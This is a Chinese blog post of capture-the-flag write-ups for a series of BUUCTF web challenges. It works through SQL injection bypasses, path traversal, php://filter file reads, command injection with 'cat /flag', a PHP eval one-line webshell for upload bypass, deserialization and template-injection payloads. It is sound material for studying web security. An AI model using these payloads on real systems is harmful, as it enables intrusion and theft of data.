BUUCTF Web1

news2024/10/6 10:32:18

[极客大挑战 2019]EasySQL

试了个万能密码就能上去了

在这里插入图片描述

flag: flag{8e685472-02e4-440a-b04e-b0d9b6d9c27f}

[HCTF 2018]WarmUp

看源码有个source.php

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?> 

还有个hint.php

在这里插入图片描述

在include包含路径中,可以随便输入一个字符串,然后再输入一个…/就可以抵消,否则就会报错不存在此路径,这里多个…/就是不断的返回上一级目录查找ffffllllaaaagggg,最后返回flag。

payload

?file=source.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

flag: flag{b807036f-4428-498f-bf2b-5991650c54f4}

[极客大挑战 2019]Havefun

看源码有一段这个

在这里插入图片描述

cat传参

在这里插入图片描述

flag: ==
flag{4f7dee31-4681-471d-8a7a-67f9a352c9a0} ==

[ACTF2020 新生赛]Include

过滤了input,但是filter没有过滤

在这里插入图片描述

尝试使用filter读取flag.php

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

解码得到flag

在这里插入图片描述

flag: flag{65c1d0ba-f4a5-40d8-bccf-b5133958500f}

[ACTF2020 新生赛]Exec

exec可以执行命令,加个分号(;) 就行

在这里插入图片描述

payload

1.1.1.1;cat /flag

在这里插入图片描述

flag: flag{b6ecdddd-175a-4384-8822-505e74818172}

[强网杯 2019]随便注

试了下,发现过滤了select

?inject=3 union select 1,database()

在这里插入图片描述

可以使用堆叠注入,可以参考这个mysql常用命令

?inject=-1';show databases; -- '

爆出数据库

在这里插入图片描述

看当前数据库的数据表,这个表有点臭。。

?inject=-1';show tables; #

在这里插入图片描述

显示表的结构,看到有个flag

?inject=-1';DESCRIBE `1919810931114514`; #

在这里插入图片描述

嫖了下大佬的wp,可以用预处理语句绕过过滤

预处理语句使用方式

SET @sql = variable;  //设置变量
PREPARE yuchuli from '[my sql sequece]';   //预定义SQL语句
EXECUTE yuchuli;  //执行预定义SQL语句sqla

select * from 1919810931114514 定义为yuchuli

PREPARE yuchuli from 'select * from `1919810931114514`';
EXECUTE yuchuli;

select是被过滤的,所以用concat进行编码绕过

SET @sql = concat(char(115,101,108,101,99,116), " * from `1919810931114514`");
PREPARE yuchuli from @sql;
EXECUTE yuchuli;

或者将把words改名为其他,191这个表改名为words,然后再添加id字段,将flag字段改为data。用已经存在的select语法查询

1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100); #

改后的表名

在这里插入图片描述

直接查询

?inject=1' or '1'='1

在这里插入图片描述

flag: flag{6e3023d2-61cd-471f-81d4-24b8d6b379ac}

[SUCTF 2019]EasySQL

post提交,变量名为 query

在这里插入图片描述

可以用select,但是过滤了union和from

在这里插入图片描述

也可以用堆叠注入

在这里插入图片描述

查看表,有个flag表,读取发现,过滤了flag

query=-1;show tables;

在这里插入图片描述

用concat拼接说太长了

在这里插入图片描述

别人的wp:
这道题目需要我们去对后端语句进行猜测,有点矛盾的地方在于其描述的功能和实际的功能似乎并不相符,通过输入非零数字得到的回显1和输入其余字符得不到回显来判断出内部的查询语句可能存在有||,也就是select 输入的数据||内置的一个列名 from 表名,进一步进行猜测即为select post进去的数据||flag from Flag(含有数据的表名,通过堆叠注入可知),需要注意的是,此时的||起到的作用是or的作用

  • 解法1

输入的内容为*,1

内置的sql语句为sql=“select”.sql=“select”.post[‘query’].“||flag from Flag”;

如果$post[‘query’]的数据为*,1,sql语句就变成了select *,1||flag from Flag,也就是select *,1 from Flag,也就是直接查询出了Flag表中的所有内容

  • 解法2

输入的内容为1;set sql_mode=pipes_as_concat;select 1

其中set sql_mode=pipes_as_concat的作用是将||的作用由or变为拼接字符串

当设置sql_mode为PIPES_AS_CONCAT时,将”||”视为字符串的连接操作符而非或运算符

在这里插入图片描述

flag: flag{6deadcba-d6dc-450c-971c-506dc34b2153}

附加几种常见的sql_mode值的介绍:
ONLY_FULL_GROUP_BY:出现在select语句、HAVING条件和ORDER BY语句中的列,必须是GROUP BY的列或者依赖于GROUP BY列的函数列。
NO_AUTO_VALUE_ON_ZERO:该值影响自增长列的插入。默认设置下,插入0或NULL代表生成下一个自增长值。如果用户希望插入的值为0,而该列又是自增长的,那么这个选项就有用了。
STRICT_TRANS_TABLES:在该模式下,如果一个值不能插入到一个事务表中,则中断当前的操作,对非事务表不做限制
NO_ZERO_IN_DATE:这个模式影响了是否允许日期中的月份和日包含0。如果开启此模式,2016-01-00是不允许的,但是0000-02-01是允许的。它实际的行为受到 strict mode是否开启的影响1。
NO_ZERO_DATE:设置该值,mysql数据库不允许插入零日期。它实际的行为受到 strictmode是否开启的影响2。
ERROR_FOR_DIVISION_BY_ZERO:在INSERT或UPDATE过程中,如果数据被零除,则产生错误而非警告。如果未给出该模式,那么数据被零除时MySQL返回NULL
NO_AUTO_CREATE_USER:禁止GRANT创建密码为空的用户
NO_ENGINE_SUBSTITUTION:如果需要的存储引擎被禁用或未编译,那么抛出错误。不设置此值时,用默认的存储引擎替代,并抛出一个异常
PIPES_AS_CONCAT:将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似
ANSI_QUOTES:启用ANSI_QUOTES后,不能用双引号来引用字符串,因为它被解释为识别符

[GXYCTF2019]Ping Ping Ping

经典ping题目

在这里插入图片描述

过滤了斜杠和空格,以及一堆符号

在这里插入图片描述

可以用 $IFS$9 来代替空格

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

匹配了过滤了flag字符,那么可以用赋值的方法来绕过

;a=ag.php;b=fl;
$b$a == flag.php

payload

http://3fb64002-9e1a-484f-83c3-4f2817c49a94.node4.buuoj.cn:81/?ip=127.0.0.1;a=ag.php;b=fl;cat$IFS$9$b$a;

或者,将ls获得的结果作为cat的参数

ip=127.0.0.1;a=ag.php;b=fl;cat$IFS$9`ls`;

flag : flag{036f2104-7253-4f76-97f7-3da92a589e67}

[极客大挑战 2019]Secret File

看源码直接跳转

抓包发现一个 secr3t.php

在这里插入图片描述

访问 secr3t.php
在这里插入图片描述
看到过滤了一些协议

 <html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

用filter协议读取

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

解密得到flag: flag{eb4a372e-12b8-4ae0-9ca9-8fc0f130757c}

[极客大挑战 2019]LoveSQL

用万能密码登录

?username='or 1=1 or'&password=123

得到串字符 37b791b0eed23e6f5326985c5227f565

试了一下,可以将这串字符作为admin的密码登录

测试下回显字段数,一共有三个

?username=admin%27%20order%20by%204%23&password=37b791b0eed23e6f5326985c5227f565

在这里插入图片描述

爆数据库名,得到数据库名为 geek

username=3%27%20union%20select%201,2,database()%23&password=123

在这里插入图片描述

爆表名

?username=3%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&password=123

得到 geekuser,l0ve1ysq1

geekuser 的列名

?username=3%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27geekuser%27%23&password=123



没啥用

在这里插入图片描述

爆另一个表的列,发现还是一样的列

爆数据

?username=3%27%20union%20select%201,2,group_concat(id,username,password)%20from%20l0ve1ysq1%23&password=123

在这里插入图片描述

得到flag: flag{dc67ad33-8641-4cc0-8f2b-1d01e606541d}

[极客大挑战 2019]Knife

直接用蚁剑就能连接,密码为 Syc

在这里插入图片描述

根目录下找到flag: flag{11d15892-08ff-4602-b0c8-8a1ad4c39750}

[极客大挑战 2019]Http

看源码有一个secret.php

在这里插入图片描述

添加Referer: https://Sycsecret.buuoj.cn伪造来源

在这里插入图片描述

修改浏览器为Syclover

在这里插入图片描述

最后一个还需要本地访问,添加X-Forwarded-For: 127.0.0.1

在这里插入图片描述
在这里插入图片描述

得到flag: flag{a45b3a57-1622-4717-a7d4-d79561bcf149}

在这里插入图片描述

[极客大挑战 2019]Upload

尝试上传一句话木马,发现有文件头检验

在这里插入图片描述

尝试上传图片马,发现不行

在这里插入图片描述

在这里插入图片描述

在16进制中将这个 ==+==改为0x00

在这里插入图片描述

还是不行,使用phtml可以上传

在这里插入图片描述

更换一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

在这里插入图片描述

尝试访问upload目录,可以访问

在这里插入图片描述

蚁剑连上得到flag: flag{63839e68-f5e1-4dbf-b14c-d644f9d0e9dc}

[ACTF2020 新生赛]Upload

只能上传图片

上传png图片马,然后抓包改成phtml后缀,可以成功上传

在这里插入图片描述

得到flag: flag{0cbe3993-1ade-4f3d-a6ff-52e5db045bc1}

[极客大挑战 2019]BabySQL

试了下万能密码,好像过滤了or

在这里插入图片描述

admin’# 成功登录

在这里插入图片描述

可以用双写绕过,先查数据库

?username=-1'uunionnion%20sselectelect%201,2,database()%23&password=123

在这里插入图片描述

爆表名

?username=3%27%20uunionnion%20sselectelect%201,2,group_concat(table_name)%20ffromrom%20infoorrmation_schema.tables%20wwherehere%20table_schema=database()%23&password=123

在这里插入图片描述

爆列名

?username=3%27%20uunionnion%20sselectelect%201,2,group_concat(column_name)%20ffromrom%20infoorrmation_schema.columns%20wwherehere%20table_name=%27b4bsql%27%23&password=123

在这里插入图片描述

爆数据,得到flag

?username=3%27%20uunionnion%20seselectlect%201,2,group_concat(id,username,passwoorrd)%20ffromrom%20b4bsql%23&password=123

在这里插入图片描述

flag: flag{5d793f14-a8b8-4f8f-a1ac-628a56872f45}

[极客大挑战 2019]PHP

看到题目描述,网站备份,访问www.zip下载源码

在这里插入图片描述

有个反序列化函数

在这里插入图片描述

unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
PHP 版本要求: PHP 4, PHP 5, PHP 7

可以直接拿kali生成序列化的代码

<?php
class Name{
    private $username='admin';
    private $password=100;
}
$name = new Name;
$result = serialize($name);
//print($result);
print(urlencode($result));
?>

这是没有url编码后的

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 

在这里插入图片描述

因为成员(属性)是private,所以要在类名和成员名前加%00这个url编码是空的意思。因为生产序列化时不会把这个空也输出。

加完%00后的payload

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

url编码后的payload,php的urlencode()会直接给空编码编译成%00

O%3A4%3A%22Name%22%3A2%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

要绕过__wakeup只要让说明的参数个数大于实际的参数个数。即将 “Name”:2 改为 “Name”:3

完整payload:

?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

在这里插入图片描述

或者用url编码后的也行,也要记得把2改为3

O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D

flag: flag{c21bde1d-c190-4ea7-b692-0c2200f264ae}

[ACTF2020 新生赛]BackupFile

看题目就想起了bak文件,提示也是去找源文件,bak是备份文件,为文件格式扩展名,这类文件一般在.bak前面加上应该有原来的扩展名比如windows.dll.bak

下载得到index.php的源码

在这里插入图片描述

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}


is_numeric() 函数用于检测变量是否为数字或数字字符串。如果指定的变量是数字和数字字符串则返回 TRUE,否则返回 FALSE,注意浮点型返回 1,即 TRUE

intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。

输入只能是数字,而比较的字符串中还有字母,php中的== 是弱比较,(弱比较:如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行,在比较时该字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值为0。所以直接传入key=123就行)

在这里插入图片描述

直接得到flag: flag{0ee92cf8-7749-4ebb-a69f-30375a668cd4}

[RoarCTF 2019]Easy Calc

关键代码:

 $('#calc').submit(function(){
        $.ajax({
            url:"calc.php?num="+encodeURIComponent($("#content").val()),
            type:'GET',
            success:function(data){
                $("#result").html(`<div class="alert alert-success">
            <strong>答案:</strong>${data}
            </div>`);
            },
            error:function(){
                alert("这啥?算不来!");
            }
        })
        return false;

calc.php,可以看到绕过了一些字符

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?> 

可以利用PHP的字符串解析特性来绕过WAF,在num前面加上空格

在这里插入图片描述

用chr(47) 来代替 /

在这里插入图片描述

读取flag

http://node4.buuoj.cn:28249/calc.php? num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));

在这里插入图片描述

flag: flag{d0d525eb-857d-4a68-9bbc-7d4b78798a2b}

[极客大挑战 2019]BuyFlag

在这里插入图片描述

翻源码

<!--
	~~~post money and password~~~
if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}

password=404a&money=1e9 ,修改user = 1

在这里插入图片描述

flag: flag{e592395c-a08c-469c-b4c3-3b48a2ffc586}

[护网杯 2018]easy_tornado

有个hint

/hints.txt
md5(cookie_secret+md5(filename))

构造payload,得到cookie_secret: 012fc7ec-46f4-4213-a9d5-c1c7452e57fd

error?msg={{handler.settings}}

在这里插入图片描述

嫖了个exp

import hashlib

cookie='012fc7ec-46f4-4213-a9d5-c1c7452e57fd'
filename='/fllllllllllllag'
md5_filename=hashlib.md5(filename.encode('utf-8')).hexdigest()
word=cookie+md5_filename
flag=hashlib.md5(word.encode('utf-8')).hexdigest()
print(flag)

在这里插入图片描述

得到flag: flag{4eff55e3-80e2-4cb1-bb17-d9260585406b}

[BJDCTF2020]Easy MD5

ffifdyop字符串会造成漏洞

输入后跳转到页面看源码

<!--
$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
-->

(1)找出md5值都是两个0e开头的开头的。原理是php里面在做 == 的时候会先把两边的类型转成一样的,因为是0e开头,php会认为它是科学技计数法,而0的多少次方都是0。
举例:
QNKCDZO
s155964671a
s1091221200a

(2)数组绕过。原理是md5等函数不能处理数组,导致函数返回Null。而Null是等于Null的,导致了绕过。(题目中就传入 ?a[]=1&b[]=2 )

第一个页面,传参

levels91.php?a=s155964671a&b=s1091221200a

第二个页面,传参

param1[]=s155964671a&param2[]=s1091221200a

得到flag:

在这里插入图片描述

flag{210c75f4-d144-4fc6-90de-fcb679774ff6}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/81001.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Mysql 创建存储过程和函数及各种例子

Mysql 创建存储过程和函数及各种例子1. Mysql 创建存储过程1.1 前言知识1.1.1 语法结构1.1.2 简单解释1.2 创建存储过程入门例子1.2.1 无参存储过程1.2.1.1 不带变量1.2.1.2 带变量1.2.2 有入参的存储过程1.2.3 有出参的存储过程1.2.4 有入参和存储的存储过程1.2.5 inout的存储…

如何将镜像上传至阿里云?如何从阿里云中拉取自己的镜像?

目录 如何将制作好的镜像上传至阿里云&#xff1f; 一、前期准备 1、注册阿里云账户 2、登录账号 3、配置Docker加速器 4、创建镜像仓库的命名空间&#xff08;私有的&#xff09; 5.创建镜像仓库(创建镜像仓库时要绑定一个代码托管网站&#xff0c;例如&#xff1a;githu…

Zookeeper集群搭建

文章目录前言Zookeeper集群搭建&#xff08;一&#xff09;LeaderFollower模式&#xff08;二&#xff09;下载zookeeeper的压缩包&#xff08;三&#xff09;解压&#xff08;四&#xff09;修改配置文件&#xff08;五&#xff09;添加myid配置&#xff08;六&#xff09;安装…

痞子衡嵌入式:存储器大厂Micron的NOR Flash芯片特殊丝印设计(FBGA代码)

大家好&#xff0c;我是痞子衡&#xff0c;是正经搞技术的痞子。今天痞子衡给大家讲的是存储器大厂Micron的NOR Flash芯片特殊丝印设计(FBGA代码)。 痞子衡之前写过一篇文章 《J-Flash在Micron Flash固定区域下载校验失败的故事》&#xff0c;这篇文章里提及了 Micron 家的串行…

明峰医疗IPO终止:亏损超过14亿元,王瑶法、潘华素夫妇为实控人

近日&#xff0c;上海证券交易所科创板披露的信息显示&#xff0c;明峰医疗系统股份有限公司&#xff08;下称“明峰医疗”&#xff09;向上海证券交易所提交了撤回上市申请文件的申请&#xff0c;保荐人海通证券提交了撤回保荐的申请。 因此&#xff0c;上海证券交易所决定终…

设计模式之创建型模式---单例模式

文章目录1.介绍2.应用场景3.实现3.1 结构3.2 类图3.3 代码示例3.3.1 饿汉式3.3.2 懒汉式3.3.3 双重检验锁3.3.3 静态内部类实现单例3.3.4 枚举类实现单例总结1.介绍 单例模式(singleton) 是指某个类中能生成一个实例&#xff0c;该类提供了一个全局访问点&#xff0c;提供一个唯…

JUC并发编程与源码分析笔记07-volatile与JMM

被volatile修饰的变量有两大特点 可见性、有序性&#xff0c;但是不保证原子性。 当写一个volatile变量时&#xff0c;JMM会把该线程对应的本地内存中的共享变量值立即刷新回主内存中。当读一个volatile变量时&#xff0c;JMM会把该线程对应的本地内存设置为无效&#xff0c;重…

Java开发:汇编语言

一、为什么学习汇编语言 中国人和中国人沟通需要学习汉语 中国人和美国人沟通在会汉语的基础上还要学习英语 那么&#xff0c;人和机器沟通的话需要学习哪些语言呢&#xff1f; 答案是&#xff1a;人类的语言机器语言 但是&#xff0c;机器语言都是由0和1组成&#xff0c;人类…

opencv图像直方图

灰度直方图&#xff1a;从数学上来说&#xff0c;图像直方图是描述图像的各个灰度级的统计特性&#xff0c;它是图像灰度值的函数&#xff0c;统计图像中各个灰度级出现的次数或频率。从图像上来说&#xff0c;灰度直方图是一个二维图像&#xff0c;横坐标为图像中各个像素点的…

git stash命令用法详解(临时存储代码)

1、需求背景 有时候在开发过程中&#xff0c;在一个分支上&#xff08;dev1&#xff09;已经写了一部分代码&#xff0c;但是需要紧急切换到别的分支(dev2)上修改某个代码&#xff0c;这时候不能直接从dev1分支上切换到dev2分支上&#xff0c;提示你需要保存代码。此时dev1分支…

Linux内存模型

sparse内存模型前言1.SPARSEMEM原理:2.vmemmap在虚拟地址空间位置3.virt&#xff0c;phys&#xff0c;page&#xff0c;pfn之间的转换关系3.1内核态虚拟地址和物理内存地址转换关系3.2页帧pfn、物理内存的page指针的关系3.3其他快捷的转换总结前言 Linux中的物理内存被按页框划…

408 考研《操作系统》第二章第五节:信号量机制和用信号量机制实现进程互斥、同步、前驱关系

文章目录教程1. 信号量机制1.1 概念1.2 信号量机制——整型信号量1.3 信号量机制——记录型信号量&#xff08;important&#xff09;1.4 总结2. 用信号量机制实现进程互斥、同步、前驱关系2.1 信号量机制实现进程互斥&#xff08;important&#xff09;2.2 信号量机制实现进程…

java基于SpringBoot的在线答疑系统的研究与实现-计算机毕业设计

项目介绍 社会的发展和科学技术的进步&#xff0c;互联网技术越来越受欢迎。网络计算机的生活方式逐渐受到广大师生的喜爱&#xff0c;也逐渐进入了每个学生的使用。互联网具有便利性&#xff0c;速度快&#xff0c;效率高&#xff0c;成本低等优点。 因此&#xff0c;构建符合…

【matplotlib】2-使用统计函数绘制简单图形

文章目录使用统计函数绘制简单图形1.函数bar()--用于绘制柱状图2.函数barh()--用于绘制条形图3.函数hist()--用于绘制条形图4.函数pie()--用于绘制饼图5.函数polar()--用于绘制极线图6.函数scatter()--用于绘制气泡图7.函数stem()--用于绘制棉棒图8.函数boxplot()--用于绘制箱线…

openGauss洗冤录 之 copy from

openGauss洗冤录 之 copy from 引子 之前一篇《测评报告&#xff1a;文件导入哪家强&#xff1f;》关于openGauss性能与预期不符的问题留下了个坑&#xff0c;今天回来填坑。 前文提到使用openGauss的copy from导入csv文件耗时是mysql的2倍&#xff0c;是PostgreSQL的6倍&#…

下载nacos-server-1.1.4安装包,使用mvn打包

git官方地址下载nacos-server-1.1.4.zip速度太慢&#xff0c;码云上下载地址没有安装包。采用从码云上下载源码&#xff0c;自行打包。(https://gitee.com/mirrors/Nacos/tree/1.1.4)下载完成之后&#xff0c;进入项目目录如图 下载源码后 &#xff0c;解压 本地在本文件夹 在d…

这十套练习,教你如何用Pandas做数据分析(03)

练习3-数据分组 探索酒类消费数据 步骤1 导入必要的库 运行以下代码 import pandas as pd 步骤2 从以下地址导入数据 运行以下代码 path3 ‘…/input/pandas_exercise/pandas_exercise/exercise_data/drinks.csv’ #‘drinks.csv’ 步骤3 将数据框命名为drinks 运行以下代…

SpringBoot+Vue实现前后端分离的航空售票管理系统

文末获取源码 开发语言&#xff1a;Java 使用框架&#xff1a;spring boot 前端技术&#xff1a;JavaScript、Vue.js 、css3 开发工具&#xff1a;IDEA/MyEclipse/Eclipse、Visual Studio Code 数据库&#xff1a;MySQL 5.7/8.0 数据库管理工具&#xff1a;phpstudy/Navicat JD…

JavaScript(一):编写位置、输入输出语句

JavaScript入门一、 JavaScript编写位置二、输入输出语句一、 JavaScript编写位置 &#xff08;1&#xff09;编写到script标签中 控制浏览器弹出一个警告框 alert("警告内容")让计算机在页面中输出一个内容 document.write() /*可以向body中输出一个内容*/向控制…

基于java+springboot+mybatis+vue+mysql的自媒体社区平台

项目介绍 近几年来自媒体平台的发展越来越迅猛&#xff0c;并逐渐成为新闻信息传播的主流模式&#xff0c;自媒体平台的内容构成没有主要的核心&#xff0c;新闻信息的探讨和传播环境比较自由&#xff0c;与此同时自媒体平台概念的应用与发展,赋予了普通民众发表自己感想的权利…